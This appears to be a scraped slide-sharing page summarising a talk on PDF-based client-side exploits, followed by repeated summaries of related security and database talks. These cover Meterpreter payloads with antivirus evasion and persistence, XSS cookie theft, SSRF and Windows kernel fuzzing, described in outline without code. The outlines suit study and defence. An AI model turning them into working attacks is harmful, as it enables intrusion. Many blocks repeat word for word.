The document discusses various client-side exploits that can be performed using PDF files. It begins by providing background on PDFs and how their programming capabilities have led to security issues. It then examines different types of exploits such as launch actions, which can execute files or scripts when a PDF is opened, and AcroJS exploits using vulnerable JavaScript APIs. The document also covers obfuscation techniques used to evade antivirus and provides a case study of embedding an executable into a PDF to automatically execute it. In summary, it analyzes the threats posed by malicious PDFs that abuse the format's programming features to carry out exploits or unwanted code execution on a victim's system.
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitPaula Januszkiewicz
On December 6th Paula Januszkiewicz delivered a session at Black Hat Europe 2017 Conference that was held in London. She spoke about DPAPI and DPAPI-NG and the CQURE's discovery in that matter.
Delivered as plenary at USENIX LISA 2013. video here: https://www.youtube.com/watch?v=nZfNehCzGdw and https://www.usenix.org/conference/lisa13/technical-sessions/plenary/gregg . "How did we ever analyze performance before Flame Graphs?" This new visualization invented by Brendan can help you quickly understand application and kernel performance, especially CPU usage, where stacks (call graphs) can be sampled and then visualized as an interactive flame graph. Flame Graphs are now used for a growing variety of targets: for applications and kernels on Linux, SmartOS, Mac OS X, and Windows; for languages including C, C++, node.js, ruby, and Lua; and in WebKit Web Inspector. This talk will explain them and provide use cases and new visualizations for other event types, including I/O, memory usage, and latency.
When does InnoDB lock a row? Multiple rows? Why would it lock a gap? How do transactions affect these scenarios? Locking is one of the more opaque features of MySQL, but it’s very important for both developers and DBA’s to understand if they want their applications to work with high performance and concurrency. This is a creative presentation to illustrate the scenarios for locking in InnoDB and make these scenarios easier to visualize. I'll cover: key locks, table locks, gap locks, shared locks, exclusive locks, intention locks, insert locks, auto-inc locks, and also conditions for deadlocks.
The document discusses the benefits of exercise for mental health. Regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitPaula Januszkiewicz
On December 6th Paula Januszkiewicz delivered a session at Black Hat Europe 2017 Conference that was held in London. She spoke about DPAPI and DPAPI-NG and the CQURE's discovery in that matter.
Delivered as plenary at USENIX LISA 2013. video here: https://www.youtube.com/watch?v=nZfNehCzGdw and https://www.usenix.org/conference/lisa13/technical-sessions/plenary/gregg . "How did we ever analyze performance before Flame Graphs?" This new visualization invented by Brendan can help you quickly understand application and kernel performance, especially CPU usage, where stacks (call graphs) can be sampled and then visualized as an interactive flame graph. Flame Graphs are now used for a growing variety of targets: for applications and kernels on Linux, SmartOS, Mac OS X, and Windows; for languages including C, C++, node.js, ruby, and Lua; and in WebKit Web Inspector. This talk will explain them and provide use cases and new visualizations for other event types, including I/O, memory usage, and latency.
When does InnoDB lock a row? Multiple rows? Why would it lock a gap? How do transactions affect these scenarios? Locking is one of the more opaque features of MySQL, but it’s very important for both developers and DBA’s to understand if they want their applications to work with high performance and concurrency. This is a creative presentation to illustrate the scenarios for locking in InnoDB and make these scenarios easier to visualize. I'll cover: key locks, table locks, gap locks, shared locks, exclusive locks, intention locks, insert locks, auto-inc locks, and also conditions for deadlocks.
The document discusses the benefits of exercise for mental health. Regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
[Session given at Engage 2019, Brussels, 15 May 2019]
In this session, Tim Davis (Technical Director at The Turtle Partnership Ltd) takes you through the new Domino Query Language (DQL), how it works, and how to use it in LotusScript, in Java, and in the new domino-db Node.js module. Introduced in Domino 10, DQL provides a simple, efficient and powerful search facility for accessing Domino documents. Originally only used in the domino-db Node.js module, with 10.0.1 DQL also became available to both LotusScript and Java. This presentation will provide code examples in all three languages, ensuring you will come away with a good understanding of DQL and how to use it in your projects.
※다운로드하시면 더 선명한 자료를 보실 수 있습니다.
동접 200만 명이 접속할 수백 대의 게임 서버가 최소한의 MySQL 서버만으로 서비스할 수 있는 구조를 설명합니다.
고성능/고효율의 MySQL 스케일링 기법을 공유합니다. 대규모 게임 서비스에서 이미 검증된 것은 안 비밀~
목차
1. 기본적인 아기텍처
2. ProxySQL을 이용한 더 나은 아키텍처
3. 최종 아키텍처
대상
- 대규모 게임 서비스에 MySQL을 사용한 경험에 관심 있는 분
- ProxySQL에 관심이 있는 서버 개발자 혹은 DBA
- 게임 서버 개발 과정에서 DB 쪽을 유연하게 구성하고 싶은 분
■관련 동영상: https://youtu.be/8Eb_n7JA1yA
This document summarizes a presentation about Amazon Aurora. It discusses how Aurora provides the speed and availability of commercial databases at a lower cost than open source databases. Aurora is a MySQL and PostgreSQL compatible database that is managed as a service, automating administrative tasks. It utilizes a distributed, self-healing storage system to provide high availability and durability across availability zones.
This document discusses various tools for monitoring and analyzing metaspace and class metadata in the Java virtual machine. It describes using -XX:+PrintGCDetails to print details of full GC collections including metaspace usage. It also discusses using MBeans, jstat -gc, and VisualVM to monitor memory pools like metaspace and class space. The document further explains using jmap -clstats to view statistics per class loader and GC.class_stats to view statistics on Java class metadata, which both require unlocking diagnostic VM options.
The document discusses Linux networking architecture and covers several key topics in 3 paragraphs or less:
It first describes the basic structure and layers of the Linux networking stack including the network device interface, network layer protocols like IP, transport layer, and sockets. It then discusses how network packets are managed in Linux through the use of socket buffers and associated functions. The document also provides an overview of the data link layer and protocols like Ethernet, PPP, and how they are implemented in Linux.
This document discusses client-side exploits and tools used for testing them in a controlled network environment. It covers using Metasploit on Kali Linux to generate and encode a Meterpreter reverse TCP payload, deploying it on a Windows client virtual machine, and using Meterpreter post-exploitation commands to maintain access including disabling antivirus and establishing persistence. The goal is to achieve a low detection payload and compromise the client while evading detection, though the document notes that no method is foolproof and antivirus vendors adapt.
Testing web application firewalls (waf) accuracyOry Segal
This presentation discusses how to properly measure the accuracy of Web Application Firewalls. The presentation explain the 4 attributes that must be measured (FP, FN, TP, TN) and how to properly calculate a WAF's accuracy.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
[Session given at Engage 2019, Brussels, 15 May 2019]
In this session, Tim Davis (Technical Director at The Turtle Partnership Ltd) takes you through the new Domino Query Language (DQL), how it works, and how to use it in LotusScript, in Java, and in the new domino-db Node.js module. Introduced in Domino 10, DQL provides a simple, efficient and powerful search facility for accessing Domino documents. Originally only used in the domino-db Node.js module, with 10.0.1 DQL also became available to both LotusScript and Java. This presentation will provide code examples in all three languages, ensuring you will come away with a good understanding of DQL and how to use it in your projects.
※다운로드하시면 더 선명한 자료를 보실 수 있습니다.
동접 200만 명이 접속할 수백 대의 게임 서버가 최소한의 MySQL 서버만으로 서비스할 수 있는 구조를 설명합니다.
고성능/고효율의 MySQL 스케일링 기법을 공유합니다. 대규모 게임 서비스에서 이미 검증된 것은 안 비밀~
목차
1. 기본적인 아기텍처
2. ProxySQL을 이용한 더 나은 아키텍처
3. 최종 아키텍처
대상
- 대규모 게임 서비스에 MySQL을 사용한 경험에 관심 있는 분
- ProxySQL에 관심이 있는 서버 개발자 혹은 DBA
- 게임 서버 개발 과정에서 DB 쪽을 유연하게 구성하고 싶은 분
■관련 동영상: https://youtu.be/8Eb_n7JA1yA
This document summarizes a presentation about Amazon Aurora. It discusses how Aurora provides the speed and availability of commercial databases at a lower cost than open source databases. Aurora is a MySQL and PostgreSQL compatible database that is managed as a service, automating administrative tasks. It utilizes a distributed, self-healing storage system to provide high availability and durability across availability zones.
This document discusses various tools for monitoring and analyzing metaspace and class metadata in the Java virtual machine. It describes using -XX:+PrintGCDetails to print details of full GC collections including metaspace usage. It also discusses using MBeans, jstat -gc, and VisualVM to monitor memory pools like metaspace and class space. The document further explains using jmap -clstats to view statistics per class loader and GC.class_stats to view statistics on Java class metadata, which both require unlocking diagnostic VM options.
The document discusses Linux networking architecture and covers several key topics in 3 paragraphs or less:
It first describes the basic structure and layers of the Linux networking stack including the network device interface, network layer protocols like IP, transport layer, and sockets. It then discusses how network packets are managed in Linux through the use of socket buffers and associated functions. The document also provides an overview of the data link layer and protocols like Ethernet, PPP, and how they are implemented in Linux.
This document discusses client-side exploits and tools used for testing them in a controlled network environment. It covers using Metasploit on Kali Linux to generate and encode a Meterpreter reverse TCP payload, deploying it on a Windows client virtual machine, and using Meterpreter post-exploitation commands to maintain access including disabling antivirus and establishing persistence. The goal is to achieve a low detection payload and compromise the client while evading detection, though the document notes that no method is foolproof and antivirus vendors adapt.
Testing web application firewalls (waf) accuracyOry Segal
This presentation discusses how to properly measure the accuracy of Web Application Firewalls. The presentation explain the 4 attributes that must be measured (FP, FN, TP, TN) and how to properly calculate a WAF's accuracy.
The document discusses the evolving threat landscape in 2010. It covers several topics: (1) vulnerabilities and exploitation increased in 2010, with Microsoft and Adobe products being frequently targeted; (2) targeted attacks like Operation Aurora exploited zero-day vulnerabilities to infiltrate major companies; (3) cybercrime expanded through exploiting social networks to send spam and distribute malware. The document analyzes these trends through specific case studies and statistics from McAfee Labs.
The document discusses various client-side exploits that can be carried out using PDF files. It describes how launch actions, AcroJS (Adobe JavaScript), and embedded executables can be used to exploit vulnerabilities in PDF readers. Specific vulnerabilities and a proof-of-concept example using a hex-encoded executable embedded in comments are presented. The document also covers obfuscation techniques used to evade detection, such as modifying the PDF format and using JavaScript obfuscation.
The real incident of stealing a droid app+dataAkash Mahajan
This is a beginner level talk/lecture about how we managed to steal data, bypass security controls and steal the source code of an Android application which was supposed to be secure.
Technically what we managed to do isn't ground breaking, but due to a combination of reasons we were able to radically change the security of the Android app for the better.
The real incident of stealing android app dataAnkur Bhargava
This is a beginner level talk/lecture about how we managed to steal data, bypass security controls and steal the source code of an Android application which was supposed to be secure.
Technically what we managed to do isn't ground breaking, but due to a combination of reasons we were able to radically change the security of the Android app for the better.
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Liang Chen
This document discusses techniques for remotely gaining root privileges on Apple devices by exploiting vulnerabilities in the graphics components. It provides an overview of Apple's graphics architecture and the allowed graphics interfaces for sandboxed processes. It then analyzes attack surfaces in the userland WindowServer and QuartzCore interfaces, describing vulnerabilities previously found that allowed escalating privileges or bypassing sandbox restrictions. Finally, it walks through the exploitation of a double free vulnerability (CVE-2016-1804) in the multi-touch handling that could be leveraged to achieve remote code execution with root privileges.
This document discusses router forensics and security. It provides an overview of routers and common router attacks. It outlines the process of performing router forensics, including collecting volatile data, investigating incidents, and documenting findings. The document also discusses why router resources need protection and why router forensics is important for addressing security issues, monitoring activity, and regulatory compliance.
This document summarizes security issues with JavaScript and discusses vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It provides examples of how XSS can be used to steal cookies and hijack sessions. It also discusses challenges with securing JSON responses and preventing code injection attacks. Countermeasures discussed include escaping output, adding random tokens to forms, and using a secure comment syntax to wrap sensitive JSON responses.
This document discusses hacking and securing iOS applications. It begins by covering iOS security concepts and loopholes, then discusses how those loopholes can affect apps and allow easy theft of app data. The remainder of the document provides guidance on how to protect apps by securing local storage locations, runtime analysis, and transport security. Key recommendations include encrypting sensitive data, using data protection APIs, restricting access to private data, and properly validating SSL certificates.
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group
This document provides an overview of assessing and securing iOS apps. It discusses setting up a testing environment by jailbreaking an iOS device to gain root access. Various tools are installed to analyze apps, including intercepting network traffic both passively and by acting as an HTTP proxy gateway. The document also covers monitoring local app data, binaries, and runtime analysis for black-box security testing of iOS apps.
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm
Lien formation complète ici:
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-lessentiel
Cette formation est une approche offensive des pratiques et des méthodologies utilisées par les hackers dans le cadre d’intrusion sur des réseaux et applications. Nous mettons l’accent sur la compréhension technique et pratique des différentes formes d’attaques existantes, en mettant l’accent sur les vulnérabilités les plus critiques.
Vous pourrez, au terme de cette formation réaliser des audits de sécurité (test de pénétration) au sein de votre infrastructure.
Il s’agit d’une formation complète sur l’essentiel de ce dont vous avez besoin afin de mettre la casquette du Hacker dans vos tests de vulnérabilité , mais aussi si vous souhaitez avoir une approche offensive de la sécurité informatique , ainsi que toute personne souhaitant acquérir les connaissances techniques d’attaques , il faut savoir attaquer pour mieux se défendre.
La présentation des techniques d’attaques et vulnérabilités sont axées pratique s au sein d’un lab de test de pénétration.
Wenn der größte Teil der Logik in JavaScript stattfindet, dann findet auch der größere Teil der Sicherheitsrisiken dort seine Heimat. Und Angreifer finden mit JavaScript eine interessante neue Umwelt, denn die Sprache selbst und auch ihre Heimat in Browser und Node.js bringen viele neue Probleme. Und genau da setzt der Vortrag an: die verblüffenden Unterschiede von JavaScript zu anderen Sprachen, wenn es um Security geht. Die Risiken und auch die Besonderheiten von Browsern und anderen JavaScript-Engines wie Node.js. Die Securityimplikationen von JavaScript-Frameworks bishin zu speziellen Problemen wie mXSS, ReDOS und HTML5-Security.
This document discusses strategies for fuzzing complex file formats that contain multiple data types, encodings, and embedded files. It recommends separating fuzzing into modular components that focus on individual data types, encodings, and objects. This allows fuzzing ASCII, binary, images, fonts and other embedded objects independently before combining them back into a single test case in a manner similar to the complex file format. Taking this modular approach helps address issues like protocol awareness, code coverage, and handling multiple encoding levels within a single complex format.
Javascript, DOM, browsers and frameworks basicsNet7
The DOM (Document Object Model) defines the logical structure of documents and how they can be accessed and manipulated. It was developed to promote cross-browser compatibility for JavaScript and other browser scripting languages. Early versions of JavaScript allowed basic access to HTML elements (DOM Level 0), while later versions enabled more advanced manipulation of CSS properties and document layers (Intermediate DOMs). The W3C brought together companies like Netscape and Microsoft to develop standards for ECMAScript and the DOM, with DOM Level 1 being finalized in 1998.
COURSE TITLE: SOFTWARE DEVELOPMENT VI
COURSE CODE: VIT 351
TOPICS COVERED:
FILES
FILES I/O STREAM
TYPES OF FILES
DRAWBACKS OF TRADITIONAL METHOD OF DATA STORAGE
CONCEPT OF BUFFER
MODES OF FILE OPENING
END OF FILE
PROCESSORS DIRECTIVES
MACROS
TYPES OF MACROS
DIFFERENCE BETWEEN MACROS AND FUNCTIONS
QUIZ SET 5
The document discusses file input and output in C programming. It explains that files are used to store large amounts of data permanently, unlike input/output functions that use terminals. The key file operations covered are opening, reading, writing, and closing files. It also describes common functions for file I/O like fopen(), fclose(), getc(), putc(), fprintf(), and fscanf(). Sample programs are provided to demonstrate reading from and writing to files.
This presentation demonstrates how the Mozilla Firefox platform could potentially be misused through malicious extensions or cross-context switching attacks. It discusses the modular and pluggable nature of Firefox extensions, and shows how extensions can be installed without review and gain full system privileges. The presentation then demonstrates attacks like keylogging, executing native code, and extracting passwords by building a malicious extension. It also explores techniques like cross-context switching and event handler attacks to subvert extension security. Developers are advised to follow security best practices to avoid these kinds of issues in their own extensions.
This document discusses analyzing malicious PDF files. It provides an overview of PDF file structure and common strings found in PDFs. Tools are presented for parsing and scanning PDFs like pdf-parser.py, pdfid.py and Peepdf. A demo is shown using these tools to analyze a sample PDF. Limitations of only scanning for strings are noted, and it is recommended to also use antivirus and online scanning services to more thoroughly check for malware in PDFs.
This document discusses analyzing malicious PDF files. It provides an overview of PDF file structure and common strings found in PDFs. Tools are presented for parsing and scanning PDFs like pdf-parser.py, pdfid.py and Peepdf. A demo is shown using these tools to analyze a sample PDF. Limitations of only scanning for strings are noted, and it is recommended to also use antivirus and online scanning services to more thoroughly check for malware in PDFs.
This document provides an introduction to file handling in Java. It discusses how file handling allows programs to permanently store output data by writing it to files on secondary storage devices like hard disks. It covers key concepts like input and output streams that represent the flow of data into and out of a program. It also discusses how to create, write to, read from, and delete files in Java using classes like File, FileWriter, FileReader and Scanner. Common file methods like getName(), getAbsolutePath(), exists() are also outlined.
Web Application Test In Ruby, is a testing framework for the web applications. Since it's built on ruby it would take the advantage of object oriented principles of ruby and makes the regression/functional testing very very simple. This presentation aims to introduce the WATIR, assists in installing and also testing with a simple test case.
This document discusses file handling in C programming. It begins by explaining why files are useful for storing data permanently and how programs can read from and write to files. It then covers the basic file operations in C like opening, reading from, writing to, and closing files. Different file modes for opening files are described. Functions for reading and writing single characters and formatted data to files like fopen, fclose, getc, putc, fscanf, fprintf are explained with examples. The document also discusses lower level functions for reading and writing blocks of data like fread and fwrite along with an example. It concludes with exercises asking the reader to write programs that read and write data to files.
This document discusses Firefox extension development. It covers why Firefox is a good platform for extensions, including its performance, security, extensibility and more. It then provides an overview of the typical structure of a Firefox extension, the technologies involved like RDF, XUL, and JavaScript, and steps for creating a basic translator extension using the Add-on SDK, including deploying and packaging the extension.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
WPF provides access to 2D and 3D graphics, controls, and rich document viewing with a consistent programming model. It uses hardware acceleration for improved visual rendering. Key benefits include broad integration, resolution independence, and declarative programming using XAML. The core WPF assemblies include PresentationFramework, PresentationCore, and WindowsBase. The Application class manages the lifetime of a WPF application, while the Window class represents individual windows. Controls such as buttons, text boxes, and containers are used to build the user interface.
The document discusses a new approach to generating DOCX, DOC, and PDF files using templates with the Zend Framework 2. It introduces LiveDocx, a SOAP-based document generation service with a PHP API called ZendService_LiveDocx. The template approach allows merging data into document templates to generate files in multiple formats like DOCX, DOC, HTML, RTF, PDF, and TXT with three simple steps: creating a template, populating merge fields with data, and writing the generated document to disk. Examples and demonstrations are provided.
The document provides an overview of various technologies used in iPhone applications, including checking internet connectivity, using SQLite database, getting current location with Core Location, parsing JSON, implementing in-app purchases, enabling AirPlay and wireless printing capabilities. It discusses relevant frameworks, classes, and code snippets.
The document discusses strategies for cybersecurity defenses against attacks. It notes that while attackers may seem powerful, they are actually constrained by resources and need vulnerabilities to exploit. It recommends techniques like hardening systems, applying patches, minimizing exposed software, using endpoint detection systems, and pretending to be in a malware analysis environment to discourage attacks. The overall message is that simple changes can make a system much harder to attack than the typical unmodified configuration that attackers rely on.
Building Desktop RIAs with PHP, HTML & Javascript in AIRfunkatron
This document discusses building desktop applications with Adobe AIR using web technologies like PHP, HTML, and JavaScript. It provides an overview of AIR and its architecture, which allows building desktop apps using these web technologies. It also discusses using JavaScript in AIR applications and some JavaScript frameworks that work well, with an emphasis on jQuery. It then discusses using PHP as the server-side language to work with AIR applications, providing some examples of using PHP and JSON for asynchronous calls and file uploading.
This document discusses security issues and vulnerabilities in the iOS operating system. It begins with an overview of the iOS hardware and software architecture, including the security features like sandboxing and code signing. It then explains what a jailbreak is and how it attacks the chain of trust to bypass these protections. The document outlines several ways sensitive data can be accessed, such as through property lists, SQLite databases, keychains, logs, and cached files. It also discusses client-side vulnerabilities like SQL injection, XSS, and logging of sensitive information. Finally, it promotes learning about mobile security through tools like OWASP iGoat and the speaker's company AppKnox.
Arun Mane is the founder and director of AmynaSec Labs. He is a security speaker and trainer who has presented at many conferences including Defcon, Blackhat, Nullcon, and HITB. His areas of expertise include security testing of IoT devices, connected vehicles, medical devices, and industrial control systems. Some common issues he finds include devices being publicly accessible, having backdoors, hardcoded credentials, and crypto or web application management problems. His testing methodology involves assessing web and mobile applications, embedded device communications, hardware testing through reverse engineering, and analyzing communication protocols and stored data.
This document outlines an agenda for a presentation on open-source intelligence (OSINT) gathering techniques. The agenda includes an introduction to OSINT, different types of intelligence gathering, a scenario example, OSINT gathering tactics and tools like Shodan, TheHarvester and Google dorks, applications of OSINT, a demonstration, references for OSINT, and a conclusion. Key OSINT tools that will be demonstrated include Twitter, Shodan, TheHarvester and Google dorks for gathering information from public online sources.
This document provides an overview of server-side request forgery (SSRF) vulnerabilities, including what SSRF is, its impact, common attacks, bypassing filters, and mitigations. SSRF allows an attacker to induce the application to make requests to internal or external servers from the server side, bypassing access controls. This can enable attacks on the server itself or other backend systems and escalate privileges. The document discusses techniques for exploiting trust relationships and bypassing blacklists/whitelists to perform SSRF attacks. It also covers blind SSRF and ways to detect them using out-of-band techniques. Mitigations include avoiding user input that can trigger server requests, sanitizing input, whitelist
Nmap is a network scanning tool that can perform port scanning, operating system detection, and version detection among other features. It works by sending TCP and UDP packets to a target machine and examining the response, comparing it to its database to determine open ports and operating system. There are different scanning techniques that can be used like TCP SYN scanning, UDP scanning, and OS detection. Nmap also includes a scripting engine that allows users to write scripts to automate networking tasks. The presentation concludes with demonstrating Nmap's features through some examples.
The document provides an introduction and overview of the Metasploit Framework. It defines key terms like vulnerability, exploit, and payload. It outlines the scenario of testing a subnet to find vulnerabilities. It describes the main features of msfconsole like searching for modules, using specific modules, and configuring options. It promotes understanding and proper use, emphasizing that Metasploit alone does not make someone a hacker.
1) The document provides guidance on testing APIs for security weaknesses, including enumerating the attack surface, common tools to use, what to test for (e.g. authentication, authorization, injections), and demo apps to practice on.
2) It recommends testing authentication and authorization mechanisms like tokens, injections attacks on state-changing requests, and how data is consumed client-side.
3) The document also discusses testing for denial of service conditions, data smuggling through middleware, API rate limiting, and cross-origin requests.
TLS 1.3 is an update to the Transport Layer Security protocol that improves security and privacy. It removes vulnerable optional parts of TLS 1.2 and only supports strong ciphers to implement perfect forward secrecy. The handshake process is also significantly shortened. TLS 1.3 provides security benefits by removing outdated ciphers and privacy benefits by enabling perfect forward secrecy by default, ensuring only endpoints can decrypt traffic even if server keys are compromised in the future.
This document provides an introduction to hacking mainframes in 2020. It begins with an overview of mainframe systems and terminology. It then discusses reconnaissance methods like port scanning and credential theft to gain initial access. Next, it covers conducting internal reconnaissance to escalate privileges by exploiting surrogate users, APF authorized libraries, and UNIX privilege escalation techniques. The document aims to provide enough context for curiosity about hacking mainframe systems.
The document discusses CRLF injection and SSRF vulnerabilities. CRLF injection occurs when user input is directly parsed into response headers without sanitization, allowing special characters to be injected. SSRF is when a server is induced to make HTTP requests to domains of an attacker's choosing, potentially escalating access. Mitigations include sanitizing user input, implementing whitelists for allowed domains/protocols, and input validation.
The document provides an overview of Active Directory, including its components and how it is used to centrally manage users, computers, and other objects within a network. It discusses key Active Directory concepts such as forests, domains, organizational units, users, computers, and domain trusts. It also provides step-by-step instructions for setting up an Active Directory lab environment for red teaming purposes and integrating a client machine into the domain.
A security engineer discusses how logs and passive reconnaissance can reveal sensitive information like AWS credentials. The engineer searched for open Jenkins and SonarQube instances which led to discovering Slack channels containing AWS access keys. Key lessons are to know your boundaries, automate mundane tasks, don't presume systems mask secrets, and persistence is important in security work.
Shodan is a search engine that indexes internet-connected devices and provides information about devices, banners, and metadata. It works by generating random IP addresses and port scans to retrieve banner information from devices. This information is then stored in a searchable database. Users can search Shodan's database using filters like country, city, IP address, operating system, and ports. Shodan can be accessed through its website or command line interface. While useful for security research, Shodan also raises privacy and security concerns by revealing information about unprotected devices.
This document outlines an agenda for discussing cloud security. It begins with an introduction to cloud computing and deployment models. It then discusses challenges of cloud computing and why cloud security is important. Specific threats like data breaches and account hijacking are listed. The document reviews the shared responsibility model and scope of security in public clouds. It describes cloud security penetration testing methods like static and dynamic application testing. Finally, it provides prerequisites and methods for conducting cloud penetration testing, including reconnaissance, threat modeling, and following standard testing methodologies.
This document discusses several techniques for maintaining persistence on Windows systems, including modifying accessibility features, injecting into image file execution options, using AppInit DLLs, application shimming, BITS jobs, registry run keys, and Windows Management Instrumentation event subscriptions. It provides details on how each technique works, common implementations, required privileges, relevant data sources, and example event log entries.
Frida is a dynamic instrumentation toolkit that allows injecting JavaScript into applications. Objection is a runtime mobile exploration toolkit powered by Frida that helps assess the security of mobile apps. It supports iOS and Android. Objection allows exploring apps by listing classes, methods, and injecting scripts to enable dynamic analysis like dumping keychain entries.
Osquery is an open source tool that allows users to perform SQL queries on their system to retrieve information. It supports various platforms and makes it easy to get details about the system. Osquery consists of Osqueryi, Osqueryd, and Osqueryctl components. Basic queries can be run in user context mode to view system information, configuration, and tables. Osqueryd runs in daemon mode and can be configured using packs and decorators to monitor specific events and files. Osqueryctl is used to control the Osquery daemon process.
This document discusses DevSecOps, beginning with an introduction from Tibin Lukose. It then covers some challenges in DevSecOps such as developers lacking security skills, cultural challenges, and difficulties balancing speed, coverage and accuracy in testing. The document proposes a model DevSecOps company, Infosys, and provides a demo and contact information for any further questions.
This document provides an introduction to XML and related technologies like libxml2, XSLT, XPath, and XML attacks. It discusses the basics of XML including elements, tags, attributes, and validation. It also describes common XML libraries and tools like libxml2, xmllint, and xsltproc. Finally, it provides an overview of different types of XML attacks like XML injection, XPath injection, XXE, and XSLT injection.
This document contains the agenda for a presentation on Linux for hackers. The agenda includes discussing the Linux file system, managing virtual machines smartly, command line tools like alias, tee, pipe, grep, cut, uniq, and xargs, Bash scripting, logging, and proxy chaining. It also mentions demonstrating several commands and tools. The presentation aims to be an interactive session where the presenter will answer any questions from attendees.
This document provides an overview of Android penetration testing. It discusses requirements and tools for static and dynamic analysis, including Apptitude, Genymotion, and ADB. It covers analyzing the Android manifest and classes.dex files. It also describes vulnerabilities in WebViews, such as loading cleartext content and improper SSL handling. Best practices for coding securely on Android are also presented.
"Scaling RAG Applications to serve millions of users", Kevin GoedeckeFwdays
How we managed to grow and scale a RAG application from zero to thousands of users in 7 months. Lessons from technical challenges around managing high load for LLMs, RAGs and Vector databases.
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Keywords: AI, Containeres, Kubernetes, Cloud Native
Event Link: https://meine.doag.org/events/cloudland/2024/agenda/#agendaId.4211
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...AlexanderRichford
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation Functions to Prevent Interaction with Malicious QR Codes.
Aim of the Study: The goal of this research was to develop a robust hybrid approach for identifying malicious and insecure URLs derived from QR codes, ensuring safe interactions.
This is achieved through:
Machine Learning Model: Predicts the likelihood of a URL being malicious.
Security Validation Functions: Ensures the derived URL has a valid certificate and proper URL format.
This innovative blend of technology aims to enhance cybersecurity measures and protect users from potential threats hidden within QR codes 🖥 🔒
This study was my first introduction to using ML which has shown me the immense potential of ML in creating more secure digital environments!
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfleebarnesutopia
So… you want to become a Test Automation Engineer (or hire and develop one)? While there’s quite a bit of information available about important technical and tool skills to master, there’s not enough discussion around the path to becoming an effective Test Automation Engineer that knows how to add VALUE. In my experience this had led to a proliferation of engineers who are proficient with tools and building frameworks but have skill and knowledge gaps, especially in software testing, that reduce the value they deliver with test automation.
In this talk, Lee will share his lessons learned from over 30 years of working with, and mentoring, hundreds of Test Automation Engineers. Whether you’re looking to get started in test automation or just want to improve your trade, this talk will give you a solid foundation and roadmap for ensuring your test automation efforts continuously add value. This talk is equally valuable for both aspiring Test Automation Engineers and those managing them! All attendees will take away a set of key foundational knowledge and a high-level learning path for leveling up test automation skills and ensuring they add value to their organizations.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
"NATO Hackathon Winner: AI-Powered Drug Search", Taras KlobaFwdays
This is a session that details how PostgreSQL's features and Azure AI Services can be effectively used to significantly enhance the search functionality in any application.
In this session, we'll share insights on how we used PostgreSQL to facilitate precise searches across multiple fields in our mobile application. The techniques include using LIKE and ILIKE operators and integrating a trigram-based search to handle potential misspellings, thereby increasing the search accuracy.
We'll also discuss how the azure_ai extension on PostgreSQL databases in Azure and Azure AI Services were utilized to create vectors from user input, a feature beneficial when users wish to find specific items based on text prompts. While our application's case study involves a drug search, the techniques and principles shared in this session can be adapted to improve search functionality in a wide range of applications. Join us to learn how PostgreSQL and Azure AI can be harnessed to enhance your application's search capability.
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillLizaNolte
HERE IS YOUR WEBINAR CONTENT! 'Mastering Customer Journey Management with Dr. Graham Hill'. We hope you find the webinar recording both insightful and enjoyable.
